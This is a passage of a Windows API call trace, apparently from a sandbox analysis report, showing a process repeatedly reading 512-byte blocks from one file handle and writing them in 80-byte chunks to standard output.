(in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.943] GetFileType (hFile=0x50) returned 0x1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.943] GetFileType (hFile=0x50) returned 0x1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.943] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.944] GetFileType (hFile=0x50) returned 0x1 [0128.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.944] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.944] GetFileType (hFile=0x50) returned 0x1 [0128.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.944] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.944] GetFileType (hFile=0x50) returned 0x1 [0128.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.944] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.944] GetFileType (hFile=0x50) returned 0x1 [0128.944] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0128.944] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.944] GetFileType (hFile=0x50) returned 0x1 [0128.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.944] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.944] GetFileType (hFile=0x50) returned 0x1 [0128.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.944] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.944] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.944] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.944] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.944] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.945] GetFileType (hFile=0x50) returned 0x1 [0128.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.945] GetFileType (hFile=0x50) returned 0x1 [0128.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.945] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, 
lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.945] GetFileType (hFile=0x50) returned 0x1 [0128.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.945] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.945] GetFileType (hFile=0x50) returned 0x1 [0128.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.945] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.945] GetFileType (hFile=0x50) returned 0x1 [0128.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.945] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.945] GetFileType (hFile=0x50) returned 0x1 [0128.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.945] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.946] GetFileType (hFile=0x50) returned 0x1 [0128.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.946] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, 
lpOverlapped=0x0) returned 1 [0128.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.946] GetFileType (hFile=0x50) returned 0x1 [0128.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.946] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.946] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.946] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.946] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.946] GetFileType (hFile=0x50) returned 0x1 [0128.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.946] GetFileType (hFile=0x50) returned 0x1 [0128.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.946] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.946] GetFileType (hFile=0x50) returned 0x1 [0128.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.946] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.946] GetFileType (hFile=0x50) returned 0x1 [0128.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.946] WriteFile (in: hFile=0x50, 
lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.947] GetFileType (hFile=0x50) returned 0x1 [0128.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.947] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.947] GetFileType (hFile=0x50) returned 0x1 [0128.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.947] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.947] GetFileType (hFile=0x50) returned 0x1 [0128.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.947] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.947] GetFileType (hFile=0x50) returned 0x1 [0128.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.947] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.947] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.947] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.947] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0128.947] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.947] GetFileType (hFile=0x50) returned 0x1 [0128.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.947] GetFileType (hFile=0x50) returned 0x1 [0128.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.947] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.948] GetFileType (hFile=0x50) returned 0x1 [0128.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.948] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.948] GetFileType (hFile=0x50) returned 0x1 [0128.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.948] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.948] GetFileType (hFile=0x50) returned 0x1 [0128.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.948] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.948] 
GetFileType (hFile=0x50) returned 0x1 [0128.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.948] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.948] GetFileType (hFile=0x50) returned 0x1 [0128.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.948] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.948] GetFileType (hFile=0x50) returned 0x1 [0128.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.948] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.948] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.948] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.949] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.949] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.949] GetFileType (hFile=0x50) returned 0x1 [0128.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.949] GetFileType (hFile=0x50) returned 0x1 [0128.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.949] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | 
out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.949] GetFileType (hFile=0x50) returned 0x1 [0128.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.949] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.949] GetFileType (hFile=0x50) returned 0x1 [0128.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.949] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.949] GetFileType (hFile=0x50) returned 0x1 [0128.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.949] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.949] GetFileType (hFile=0x50) returned 0x1 [0128.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.949] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.949] GetFileType (hFile=0x50) returned 0x1 [0128.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.950] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, 
lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.950] GetFileType (hFile=0x50) returned 0x1 [0128.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.950] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.950] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.950] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.950] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.950] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.950] GetFileType (hFile=0x50) returned 0x1 [0128.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.950] GetFileType (hFile=0x50) returned 0x1 [0128.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.950] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.950] GetFileType (hFile=0x50) returned 0x1 [0128.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.950] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.950] GetFileType (hFile=0x50) returned 0x1 [0128.950] _get_osfhandle (_FileHandle=1) returned 0x50 
[0128.950] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.950] GetFileType (hFile=0x50) returned 0x1 [0128.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.951] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.951] GetFileType (hFile=0x50) returned 0x1 [0128.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.951] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.951] GetFileType (hFile=0x50) returned 0x1 [0128.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.951] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.951] GetFileType (hFile=0x50) returned 0x1 [0128.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.951] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.951] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.951] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) 
returned 1 [0128.951] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.951] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.951] GetFileType (hFile=0x50) returned 0x1 [0128.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.951] GetFileType (hFile=0x50) returned 0x1 [0128.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.951] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.951] GetFileType (hFile=0x50) returned 0x1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] GetFileType (hFile=0x50) returned 0x1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] GetFileType (hFile=0x50) returned 0x1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.952] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0128.952] GetFileType (hFile=0x50) returned 0x1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] GetFileType (hFile=0x50) returned 0x1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] GetFileType (hFile=0x50) returned 0x1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.952] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.952] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.952] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.952] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] GetFileType (hFile=0x50) returned 0x1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] GetFileType (hFile=0x50) returned 0x1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, 
